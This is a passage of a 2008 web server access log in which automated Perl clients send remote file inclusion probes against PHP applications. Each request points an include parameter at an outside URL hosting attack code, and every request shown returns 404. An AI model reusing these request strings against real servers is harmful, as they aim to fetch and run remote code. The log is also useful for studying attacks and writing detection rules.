67.18.151.242 - - [10/Aug/2008:19:17:31 -0700] "GET /logs/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.18.151.242 - - [10/Aug/2008:19:17:31 -0700] "GET /logs/access_071015.log/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.18.151.242 - - [10/Aug/2008:19:17:31 -0700] "GET /com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.18.151.242 - - [10/Aug/2008:19:17:31 -0700] "GET /logs/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
84.21.71.133 - - [10/Aug/2008:19:17:42 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
84.21.71.133 - - [10/Aug/2008:19:17:42 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.75.35.118 - - [10/Aug/2008:19:17:52 -0700] "GET /logs/access_080120.log//include/print_category.php?setup[use_category]=1&dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.75.35.118 - - [10/Aug/2008:19:17:52 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.75.35.118 - - [10/Aug/2008:19:17:52 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:18:06 -0700] "GET /logs/access_080414.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.18.151.242 - - [10/Aug/2008:19:18:12 -0700] "GET /logs/scripts.log/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:18:15 -0700] "GET /logs/access_080414.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.18.151.242 - - [10/Aug/2008:19:18:18 -0700] "GET /logs/scripts.log/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
83.65.7.74 - - [10/Aug/2008:19:18:23 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:18:26 -0700] "GET /logs/access_080414.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.147.237.74 - - [10/Aug/2008:19:18:30 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hitmanslife.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.147.237.74 - - [10/Aug/2008:19:18:30 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hitmanslife.net/id.txt??? HTTP/1.